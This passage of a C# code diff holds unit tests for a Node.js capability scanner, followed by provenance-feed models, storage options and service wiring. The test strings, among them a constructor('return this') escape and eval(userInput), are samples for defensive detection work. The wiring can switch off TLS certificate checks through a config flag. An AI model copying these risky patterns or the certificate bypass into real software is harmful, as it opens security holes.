Assert.Equal("__proto__", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsObjectSetPrototypeOf()
{
const string code = @"Object.setPrototypeOf(obj, proto);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Object.setPrototypeOf", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsConstructorAccess()
{
const string code = @"obj.constructor('return this')();";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal(".constructor()", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsRequireNodeAddon()
{
const string code = @"const addon = require('./build/Release/addon.node');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("require('.node')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsProcessDlopen()
{
const string code = @"process.dlopen(module, filename);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("process.dlopen", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireFfiNapi()
{
const string code = @"const ffi = require('ffi-napi');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("require('ffi-napi')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsWebAssemblyInstantiate()
{
const string code = @"const instance = await WebAssembly.instantiate(wasmBuffer);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("WebAssembly.instantiate", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsWebAssemblyCompile()
{
const string code = @"const module = await WebAssembly.compile(wasmBuffer);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("WebAssembly.compile", result[0].Pattern);
}
#endregion
#region ScanFile - Other Patterns
[Fact]
public void ScanFile_DetectsRequireWorkerThreads()
{
const string code = @"const { Worker } = require('worker_threads');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("require('worker_threads')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProcessKill()
{
const string code = @"process.kill(pid, 'SIGTERM');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("process.kill", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsDynamicRequire()
{
const string code = @"const mod = require(moduleName);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("require(variable)", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireInspector()
{
const string code = @"const inspector = require('inspector');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("require('inspector')", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region NodeCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new NodeCapabilityEvidence(
CapabilityKind.Exec,
"test.js",
10,
"child_process.exec");
Assert.Equal("Exec|test.js|10|child_process.exec", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new NodeCapabilityEvidence(
CapabilityKind.Exec, "test.js", 1, "pattern",
confidence: 2.0f);
var evidence2 = new NodeCapabilityEvidence(
CapabilityKind.Exec, "test.js", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new NodeCapabilityEvidence(
CapabilityKind.DynamicCode,
"test.js",
10,
"eval",
snippet: "eval(userInput);",
confidence: 1.0f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("dynamiccode", metadata["capability.kind"]);
Assert.Equal("test.js:10", metadata["capability.source"]);
Assert.Equal("eval", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("1.00", metadata["capability.confidence"]);
Assert.Contains("eval", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new NodeCapabilityEvidence(
CapabilityKind.Exec,
"test.js",
10,
"child_process.exec");
var langEvidence = evidence.ToLanguageEvidence();
Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("test.js", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:child_process.exec", langEvidence.Value);
}
#endregion
}

View File

@@ -0,0 +1,343 @@
using System;
using System.Collections.Generic;
using System.Text.Json.Serialization;
using MongoDB.Bson.Serialization.Attributes;
namespace StellaOps.Signals.Models;
/// <summary>
/// AOC (Aggregation-Only Contract) provenance feed for runtime facts ingestion (SGSI0101).
/// Conforms to docs/schemas/provenance-feed.schema.json.
/// </summary>
public sealed class ProvenanceFeed
{
public const int CurrentSchemaVersion = 1;
[BsonElement("schemaVersion")]
[JsonPropertyName("schemaVersion")]
public int SchemaVersion { get; init; } = CurrentSchemaVersion;
[BsonElement("feedId")]
[JsonPropertyName("feedId")]
public string FeedId { get; init; } = Guid.NewGuid().ToString("D");
[BsonElement("feedType")]
[JsonPropertyName("feedType")]
public ProvenanceFeedType FeedType { get; init; } = ProvenanceFeedType.RuntimeFacts;
[BsonElement("generatedAt")]
[JsonPropertyName("generatedAt")]
public DateTimeOffset GeneratedAt { get; init; } = DateTimeOffset.UtcNow;
[BsonElement("sourceService")]
[BsonIgnoreIfNull]
[JsonPropertyName("sourceService")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? SourceService { get; init; }
[BsonElement("tenantId")]
[BsonIgnoreIfNull]
[JsonPropertyName("tenantId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? TenantId { get; init; }
[BsonElement("correlationId")]
[BsonIgnoreIfNull]
[JsonPropertyName("correlationId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? CorrelationId { get; init; }
[BsonElement("records")]
[JsonPropertyName("records")]
public List<ProvenanceRecord> Records { get; init; } = new();
[BsonElement("metadata")]
[BsonIgnoreIfNull]
[JsonPropertyName("metadata")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public Dictionary<string, string?>? Metadata { get; init; }
[BsonElement("attestation")]
[BsonIgnoreIfNull]
[JsonPropertyName("attestation")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public FeedAttestation? Attestation { get; init; }
}
[JsonConverter(typeof(JsonStringEnumConverter))]
public enum ProvenanceFeedType
{
[JsonPropertyName("RUNTIME_FACTS")]
RuntimeFacts,
[JsonPropertyName("SIGNAL_ENRICHMENT")]
SignalEnrichment,
[JsonPropertyName("CAS_PROMOTION")]
CasPromotion,
[JsonPropertyName("SCORING_OUTPUT")]
ScoringOutput,
[JsonPropertyName("AUTHORITY_SCOPES")]
AuthorityScopes
}
/// <summary>
/// Individual provenance record within a feed.
/// </summary>
public sealed class ProvenanceRecord
{
[BsonElement("recordId")]
[JsonPropertyName("recordId")]
public string RecordId { get; init; } = Guid.NewGuid().ToString("D");
[BsonElement("recordType")]
[JsonPropertyName("recordType")]
public string RecordType { get; init; } = string.Empty;
[BsonElement("subject")]
[JsonPropertyName("subject")]
public ProvenanceSubject Subject { get; init; } = new();
[BsonElement("occurredAt")]
[JsonPropertyName("occurredAt")]
public DateTimeOffset OccurredAt { get; init; }
[BsonElement("observedBy")]
[BsonIgnoreIfNull]
[JsonPropertyName("observedBy")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? ObservedBy { get; init; }
[BsonElement("confidence")]
[BsonIgnoreIfNull]
[JsonPropertyName("confidence")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public double? Confidence { get; init; }
[BsonElement("facts")]
[BsonIgnoreIfNull]
[JsonPropertyName("facts")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public RuntimeProvenanceFacts? Facts { get; init; }
[BsonElement("evidence")]
[BsonIgnoreIfNull]
[JsonPropertyName("evidence")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public RecordEvidence? Evidence { get; init; }
}
/// <summary>
/// Subject of a provenance record.
/// </summary>
public sealed class ProvenanceSubject
{
[BsonElement("type")]
[JsonPropertyName("type")]
public ProvenanceSubjectType Type { get; init; } = ProvenanceSubjectType.Package;
[BsonElement("identifier")]
[JsonPropertyName("identifier")]
public string Identifier { get; init; } = string.Empty;
[BsonElement("digest")]
[BsonIgnoreIfNull]
[JsonPropertyName("digest")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? Digest { get; init; }
[BsonElement("namespace")]
[BsonIgnoreIfNull]
[JsonPropertyName("namespace")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? Namespace { get; init; }
}
[JsonConverter(typeof(JsonStringEnumConverter))]
public enum ProvenanceSubjectType
{
[JsonPropertyName("CONTAINER")]
Container,
[JsonPropertyName("PROCESS")]
Process,
[JsonPropertyName("PACKAGE")]
Package,
[JsonPropertyName("FILE")]
File,
[JsonPropertyName("NETWORK")]
Network,
[JsonPropertyName("IMAGE")]
Image
}
/// <summary>
/// Runtime-specific provenance facts.
/// </summary>
public sealed class RuntimeProvenanceFacts
{
[BsonElement("symbolId")]
[BsonIgnoreIfNull]
[JsonPropertyName("symbolId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? SymbolId { get; init; }
[BsonElement("processName")]
[BsonIgnoreIfNull]
[JsonPropertyName("processName")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? ProcessName { get; init; }
[BsonElement("processId")]
[BsonIgnoreIfNull]
[JsonPropertyName("processId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public int? ProcessId { get; init; }
[BsonElement("socketAddress")]
[BsonIgnoreIfNull]
[JsonPropertyName("socketAddress")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? SocketAddress { get; init; }
[BsonElement("containerId")]
[BsonIgnoreIfNull]
[JsonPropertyName("containerId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? ContainerId { get; init; }
[BsonElement("hitCount")]
[JsonPropertyName("hitCount")]
public int HitCount { get; init; }
[BsonElement("purl")]
[BsonIgnoreIfNull]
[JsonPropertyName("purl")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? Purl { get; init; }
[BsonElement("codeId")]
[BsonIgnoreIfNull]
[JsonPropertyName("codeId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? CodeId { get; init; }
[BsonElement("buildId")]
[BsonIgnoreIfNull]
[JsonPropertyName("buildId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? BuildId { get; init; }
[BsonElement("loaderBase")]
[BsonIgnoreIfNull]
[JsonPropertyName("loaderBase")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? LoaderBase { get; init; }
[BsonElement("metadata")]
[BsonIgnoreIfNull]
[JsonPropertyName("metadata")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public Dictionary<string, string?>? Metadata { get; init; }
}
/// <summary>
/// Evidence supporting a provenance record.
/// </summary>
public sealed class RecordEvidence
{
[BsonElement("sourceDigest")]
[BsonIgnoreIfNull]
[JsonPropertyName("sourceDigest")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? SourceDigest { get; init; }
[BsonElement("captureMethod")]
[BsonIgnoreIfNull]
[JsonPropertyName("captureMethod")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public EvidenceCaptureMethod? CaptureMethod { get; init; }
[BsonElement("rawDataRef")]
[BsonIgnoreIfNull]
[JsonPropertyName("rawDataRef")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? RawDataRef { get; init; }
}
[JsonConverter(typeof(JsonStringEnumConverter))]
public enum EvidenceCaptureMethod
{
[JsonPropertyName("eBPF")]
EBpf,
[JsonPropertyName("PROC_SCAN")]
ProcScan,
[JsonPropertyName("API_CALL")]
ApiCall,
[JsonPropertyName("LOG_ANALYSIS")]
LogAnalysis,
[JsonPropertyName("STATIC_ANALYSIS")]
StaticAnalysis
}
/// <summary>
/// Attestation metadata for a provenance feed.
/// </summary>
public sealed class FeedAttestation
{
[BsonElement("predicateType")]
[JsonPropertyName("predicateType")]
public string PredicateType { get; init; } = "https://stella.ops/attestation/provenance-feed/v1";
[BsonElement("signedAt")]
[JsonPropertyName("signedAt")]
public DateTimeOffset SignedAt { get; init; }
[BsonElement("keyId")]
[BsonIgnoreIfNull]
[JsonPropertyName("keyId")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? KeyId { get; init; }
[BsonElement("envelopeDigest")]
[BsonIgnoreIfNull]
[JsonPropertyName("envelopeDigest")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? EnvelopeDigest { get; init; }
[BsonElement("transparencyLog")]
[BsonIgnoreIfNull]
[JsonPropertyName("transparencyLog")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public string? TransparencyLog { get; init; }
}
/// <summary>
/// Context facts container stored on ReachabilityFactDocument.
/// </summary>
public sealed class ContextFacts
{
[BsonElement("provenance")]
[BsonIgnoreIfNull]
[JsonPropertyName("provenance")]
[JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
public ProvenanceFeed? Provenance { get; set; }
[BsonElement("lastUpdatedAt")]
[JsonPropertyName("lastUpdatedAt")]
public DateTimeOffset LastUpdatedAt { get; set; }
[BsonElement("recordCount")]
[JsonPropertyName("recordCount")]
public int RecordCount { get; set; }
}

View File

@@ -31,6 +31,10 @@ public sealed class ReachabilityFactDocument
[BsonIgnoreIfNull] [BsonIgnoreIfNull]
public Dictionary<string, string?>? Metadata { get; set; } public Dictionary<string, string?>? Metadata { get; set; }
[BsonElement("contextFacts")]
[BsonIgnoreIfNull]
public ContextFacts? ContextFacts { get; set; }
[BsonElement("score")] [BsonElement("score")]
public double Score { get; set; } public double Score { get; set; }

View File

@@ -1,4 +1,5 @@
using System; using System;
using System.Collections.Generic;
using System.IO; using System.IO;
namespace StellaOps.Signals.Options; namespace StellaOps.Signals.Options;
@@ -9,18 +10,144 @@ namespace StellaOps.Signals.Options;
public sealed class SignalsArtifactStorageOptions public sealed class SignalsArtifactStorageOptions
{ {
/// <summary> /// <summary>
/// Root directory used to persist raw callgraph artifacts. /// Storage driver: "filesystem" (default) or "rustfs".
/// </summary>
public string Driver { get; set; } = SignalsStorageDrivers.FileSystem;
/// <summary>
/// Root directory used to persist raw callgraph artifacts (filesystem driver).
/// </summary> /// </summary>
public string RootPath { get; set; } = Path.Combine(AppContext.BaseDirectory, "callgraph-artifacts"); public string RootPath { get; set; } = Path.Combine(AppContext.BaseDirectory, "callgraph-artifacts");
/// <summary>
/// Bucket name for CAS storage (RustFS driver).
/// Per CAS contract, signals uses "signals-data" bucket.
/// </summary>
public string BucketName { get; set; } = "signals-data";
/// <summary>
/// Root prefix within the bucket for callgraph artifacts.
/// </summary>
public string RootPrefix { get; set; } = "callgraphs";
/// <summary>
/// RustFS-specific options.
/// </summary>
public SignalsRustFsOptions RustFs { get; set; } = new();
/// <summary>
/// Additional headers to include in storage requests.
/// </summary>
public IDictionary<string, string> Headers { get; } = new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase);
/// <summary>
/// Returns true if the filesystem driver is configured.
/// </summary>
public bool IsFileSystemDriver()
=> string.Equals(Driver, SignalsStorageDrivers.FileSystem, StringComparison.OrdinalIgnoreCase);
/// <summary>
/// Returns true if the RustFS driver is configured.
/// </summary>
public bool IsRustFsDriver()
=> string.Equals(Driver, SignalsStorageDrivers.RustFs, StringComparison.OrdinalIgnoreCase);
/// <summary> /// <summary>
/// Validates the configured values. /// Validates the configured values.
/// </summary> /// </summary>
public void Validate() public void Validate()
{ {
if (string.IsNullOrWhiteSpace(RootPath)) if (!IsFileSystemDriver() && !IsRustFsDriver())
{ {
throw new InvalidOperationException("Signals artifact storage path must be configured."); throw new InvalidOperationException($"Signals storage driver '{Driver}' is not supported. Use '{SignalsStorageDrivers.FileSystem}' or '{SignalsStorageDrivers.RustFs}'.");
}
if (IsFileSystemDriver() && string.IsNullOrWhiteSpace(RootPath))
{
throw new InvalidOperationException("Signals artifact storage path must be configured for filesystem driver.");
}
if (IsRustFsDriver())
{
RustFs ??= new SignalsRustFsOptions();
RustFs.Validate();
if (string.IsNullOrWhiteSpace(BucketName))
{
throw new InvalidOperationException("Signals storage bucket name must be configured for RustFS driver.");
}
} }
} }
} }
/// <summary>
/// RustFS-specific configuration options.
/// </summary>
public sealed class SignalsRustFsOptions
{
/// <summary>
/// Base URL for the RustFS service (e.g., http://localhost:8180/api/v1).
/// </summary>
public string BaseUrl { get; set; } = string.Empty;
/// <summary>
/// Allow insecure TLS connections (development only).
/// </summary>
public bool AllowInsecureTls { get; set; }
/// <summary>
/// API key for authentication.
/// </summary>
public string? ApiKey { get; set; }
/// <summary>
/// Header name for the API key (e.g., "X-API-Key").
/// </summary>
public string ApiKeyHeader { get; set; } = "X-API-Key";
/// <summary>
/// HTTP request timeout.
/// </summary>
public TimeSpan Timeout { get; set; } = TimeSpan.FromSeconds(60);
/// <summary>
/// Validates the configured values.
/// </summary>
public void Validate()
{
if (string.IsNullOrWhiteSpace(BaseUrl))
{
throw new InvalidOperationException("RustFS baseUrl must be configured.");
}
if (!Uri.TryCreate(BaseUrl, UriKind.Absolute, out var uri))
{
throw new InvalidOperationException("RustFS baseUrl must be an absolute URI.");
}
if (!string.Equals(uri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
&& !string.Equals(uri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase))
{
throw new InvalidOperationException("RustFS baseUrl must use HTTP or HTTPS.");
}
if (Timeout <= TimeSpan.Zero)
{
throw new InvalidOperationException("RustFS timeout must be greater than zero.");
}
if (!string.IsNullOrWhiteSpace(ApiKeyHeader) && string.IsNullOrWhiteSpace(ApiKey))
{
throw new InvalidOperationException("RustFS API key header name requires a non-empty API key.");
}
}
}
/// <summary>
/// Supported storage driver names.
/// </summary>
public static class SignalsStorageDrivers
{
public const string FileSystem = "filesystem";
public const string RustFs = "rustfs";
}

View File

@@ -1,4 +1,5 @@
using System.IO; using System.IO;
using System.Net.Http;
using System.Threading.Tasks; using System.Threading.Tasks;
using Microsoft.AspNetCore.Authentication; using Microsoft.AspNetCore.Authentication;
using Microsoft.AspNetCore.Mvc; using Microsoft.AspNetCore.Mvc;
@@ -124,7 +125,34 @@ builder.Services.AddSingleton<IMongoCollection<UnknownSymbolDocument>>(sp =>
}); });
builder.Services.AddSingleton<ICallgraphRepository, MongoCallgraphRepository>(); builder.Services.AddSingleton<ICallgraphRepository, MongoCallgraphRepository>();
builder.Services.AddSingleton<ICallgraphArtifactStore, FileSystemCallgraphArtifactStore>();
// Configure callgraph artifact storage based on driver
if (bootstrap.Storage.IsRustFsDriver())
{
// Configure HttpClient for RustFS
builder.Services.AddHttpClient(RustFsCallgraphArtifactStore.HttpClientName, (sp, client) =>
{
var opts = sp.GetRequiredService<IOptions<SignalsOptions>>().Value;
client.Timeout = opts.Storage.RustFs.Timeout;
})
.ConfigurePrimaryHttpMessageHandler(sp =>
{
var opts = sp.GetRequiredService<IOptions<SignalsOptions>>().Value;
var handler = new HttpClientHandler();
if (opts.Storage.RustFs.AllowInsecureTls)
{
handler.ServerCertificateCustomValidationCallback = HttpClientHandler.DangerousAcceptAnyServerCertificateValidator;
}
return handler;
});
builder.Services.AddSingleton<ICallgraphArtifactStore, RustFsCallgraphArtifactStore>();
}
else
{
builder.Services.AddSingleton<ICallgraphArtifactStore, FileSystemCallgraphArtifactStore>();
}
builder.Services.AddSingleton<ICallgraphParser>(new SimpleJsonCallgraphParser("java")); builder.Services.AddSingleton<ICallgraphParser>(new SimpleJsonCallgraphParser("java"));
builder.Services.AddSingleton<ICallgraphParser>(new SimpleJsonCallgraphParser("nodejs")); builder.Services.AddSingleton<ICallgraphParser>(new SimpleJsonCallgraphParser("nodejs"));
builder.Services.AddSingleton<ICallgraphParser>(new SimpleJsonCallgraphParser("python")); builder.Services.AddSingleton<ICallgraphParser>(new SimpleJsonCallgraphParser("python"));
@@ -145,6 +173,7 @@ builder.Services.AddSingleton<IReachabilityFactRepository>(sp =>
return new ReachabilityFactCacheDecorator(inner, cache); return new ReachabilityFactCacheDecorator(inner, cache);
}); });
builder.Services.AddSingleton<IReachabilityScoringService, ReachabilityScoringService>(); builder.Services.AddSingleton<IReachabilityScoringService, ReachabilityScoringService>();
builder.Services.AddSingleton<IRuntimeFactsProvenanceNormalizer, RuntimeFactsProvenanceNormalizer>();
builder.Services.AddSingleton<IRuntimeFactsIngestionService, RuntimeFactsIngestionService>(); builder.Services.AddSingleton<IRuntimeFactsIngestionService, RuntimeFactsIngestionService>();
builder.Services.AddSingleton<IReachabilityUnionIngestionService, ReachabilityUnionIngestionService>(); builder.Services.AddSingleton<IReachabilityUnionIngestionService, ReachabilityUnionIngestionService>();
builder.Services.AddSingleton<IUnknownsRepository, MongoUnknownsRepository>(); builder.Services.AddSingleton<IUnknownsRepository, MongoUnknownsRepository>();

View File

@@ -17,6 +17,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
private readonly IReachabilityCache cache; private readonly IReachabilityCache cache;
private readonly IEventsPublisher eventsPublisher; private readonly IEventsPublisher eventsPublisher;
private readonly IReachabilityScoringService scoringService; private readonly IReachabilityScoringService scoringService;
private readonly IRuntimeFactsProvenanceNormalizer provenanceNormalizer;
private readonly ILogger<RuntimeFactsIngestionService> logger; private readonly ILogger<RuntimeFactsIngestionService> logger;
public RuntimeFactsIngestionService( public RuntimeFactsIngestionService(
@@ -25,6 +26,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
IReachabilityCache cache, IReachabilityCache cache,
IEventsPublisher eventsPublisher, IEventsPublisher eventsPublisher,
IReachabilityScoringService scoringService, IReachabilityScoringService scoringService,
IRuntimeFactsProvenanceNormalizer provenanceNormalizer,
ILogger<RuntimeFactsIngestionService> logger) ILogger<RuntimeFactsIngestionService> logger)
{ {
this.factRepository = factRepository ?? throw new ArgumentNullException(nameof(factRepository)); this.factRepository = factRepository ?? throw new ArgumentNullException(nameof(factRepository));
@@ -32,6 +34,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
this.cache = cache ?? throw new ArgumentNullException(nameof(cache)); this.cache = cache ?? throw new ArgumentNullException(nameof(cache));
this.eventsPublisher = eventsPublisher ?? throw new ArgumentNullException(nameof(eventsPublisher)); this.eventsPublisher = eventsPublisher ?? throw new ArgumentNullException(nameof(eventsPublisher));
this.scoringService = scoringService ?? throw new ArgumentNullException(nameof(scoringService)); this.scoringService = scoringService ?? throw new ArgumentNullException(nameof(scoringService));
this.provenanceNormalizer = provenanceNormalizer ?? throw new ArgumentNullException(nameof(provenanceNormalizer));
this.logger = logger ?? NullLogger<RuntimeFactsIngestionService>.Instance; this.logger = logger ?? NullLogger<RuntimeFactsIngestionService>.Instance;
} }
@@ -62,6 +65,14 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
document.Metadata["provenance.ingestedAt"] = document.ComputedAt.ToString("O"); document.Metadata["provenance.ingestedAt"] = document.ComputedAt.ToString("O");
document.Metadata["provenance.callgraphId"] = request.CallgraphId; document.Metadata["provenance.callgraphId"] = request.CallgraphId;
// Populate context_facts with AOC provenance (SIGNALS-24-003)
document.ContextFacts = provenanceNormalizer.CreateContextFacts(
request.Events,
request.Subject,
request.CallgraphId,
request.Metadata,
document.ComputedAt);
var persisted = await factRepository.UpsertAsync(document, cancellationToken).ConfigureAwait(false); var persisted = await factRepository.UpsertAsync(document, cancellationToken).ConfigureAwait(false);
await cache.SetAsync(persisted, cancellationToken).ConfigureAwait(false); await cache.SetAsync(persisted, cancellationToken).ConfigureAwait(false);
await eventsPublisher.PublishFactUpdatedAsync(persisted, cancellationToken).ConfigureAwait(false); await eventsPublisher.PublishFactUpdatedAsync(persisted, cancellationToken).ConfigureAwait(false);

View File

@@ -0,0 +1,385 @@
using System;
using System.Collections.Generic;
using System.Linq;
using StellaOps.Signals.Models;
namespace StellaOps.Signals.Services;
/// <summary>
/// Normalizes runtime fact events into AOC provenance records per SIGNALS-24-003.
/// Converts process, socket, and container metadata to <see cref="ProvenanceRecord"/> format.
/// </summary>
public interface IRuntimeFactsProvenanceNormalizer
{
/// <summary>
/// Normalizes runtime fact events into a provenance feed.
/// </summary>
ProvenanceFeed NormalizeToFeed(
IEnumerable<RuntimeFactEvent> events,
ReachabilitySubject subject,
string callgraphId,
Dictionary<string, string?>? metadata,
DateTimeOffset generatedAt);
/// <summary>
/// Creates or updates context facts from runtime events.
/// </summary>
ContextFacts CreateContextFacts(
IEnumerable<RuntimeFactEvent> events,
ReachabilitySubject subject,
string callgraphId,
Dictionary<string, string?>? metadata,
DateTimeOffset timestamp);
}
/// <summary>
/// Default implementation of runtime facts provenance normalizer.
/// </summary>
public sealed class RuntimeFactsProvenanceNormalizer : IRuntimeFactsProvenanceNormalizer
{
private const string SourceService = "signals-runtime-ingestion";
private const double DefaultConfidence = 0.95;
public ProvenanceFeed NormalizeToFeed(
IEnumerable<RuntimeFactEvent> events,
ReachabilitySubject subject,
string callgraphId,
Dictionary<string, string?>? metadata,
DateTimeOffset generatedAt)
{
ArgumentNullException.ThrowIfNull(events);
ArgumentNullException.ThrowIfNull(subject);
var eventsList = events.Where(e => e is not null && !string.IsNullOrWhiteSpace(e.SymbolId)).ToList();
var records = new List<ProvenanceRecord>(eventsList.Count);
foreach (var evt in eventsList)
{
var record = NormalizeEvent(evt, subject, callgraphId, generatedAt);
if (record is not null)
{
records.Add(record);
}
}
var feedMetadata = new Dictionary<string, string?>(StringComparer.Ordinal)
{
["aoc.version"] = "1",
["aoc.contract"] = "SGSI0101",
["callgraphId"] = callgraphId,
["subjectKey"] = subject.ToSubjectKey()
};
if (metadata is not null)
{
foreach (var (key, value) in metadata)
{
feedMetadata[$"request.{key}"] = value;
}
}
return new ProvenanceFeed
{
SchemaVersion = ProvenanceFeed.CurrentSchemaVersion,
FeedId = Guid.NewGuid().ToString("D"),
FeedType = ProvenanceFeedType.RuntimeFacts,
GeneratedAt = generatedAt,
SourceService = SourceService,
CorrelationId = callgraphId,
Records = records,
Metadata = feedMetadata
};
}
public ContextFacts CreateContextFacts(
IEnumerable<RuntimeFactEvent> events,
ReachabilitySubject subject,
string callgraphId,
Dictionary<string, string?>? metadata,
DateTimeOffset timestamp)
{
var feed = NormalizeToFeed(events, subject, callgraphId, metadata, timestamp);
return new ContextFacts
{
Provenance = feed,
LastUpdatedAt = timestamp,
RecordCount = feed.Records.Count
};
}
private static ProvenanceRecord? NormalizeEvent(
RuntimeFactEvent evt,
ReachabilitySubject subject,
string callgraphId,
DateTimeOffset generatedAt)
{
if (string.IsNullOrWhiteSpace(evt.SymbolId))
{
return null;
}
var recordType = DetermineRecordType(evt);
var subjectType = DetermineSubjectType(evt, subject);
var provenanceSubject = new ProvenanceSubject
{
Type = subjectType,
Identifier = BuildSubjectIdentifier(evt, subject),
Digest = NormalizeDigest(evt.SymbolDigest),
Namespace = ExtractNamespace(evt.ContainerId, subject)
};
var facts = new RuntimeProvenanceFacts
{
SymbolId = evt.SymbolId.Trim(),
ProcessName = Normalize(evt.ProcessName),
ProcessId = evt.ProcessId,
SocketAddress = Normalize(evt.SocketAddress),
ContainerId = Normalize(evt.ContainerId),
HitCount = Math.Max(evt.HitCount, 1),
Purl = Normalize(evt.Purl),
CodeId = Normalize(evt.CodeId),
BuildId = Normalize(evt.BuildId),
LoaderBase = Normalize(evt.LoaderBase),
Metadata = evt.Metadata
};
var evidence = BuildEvidence(evt);
return new ProvenanceRecord
{
RecordId = Guid.NewGuid().ToString("D"),
RecordType = recordType,
Subject = provenanceSubject,
OccurredAt = evt.ObservedAt ?? generatedAt,
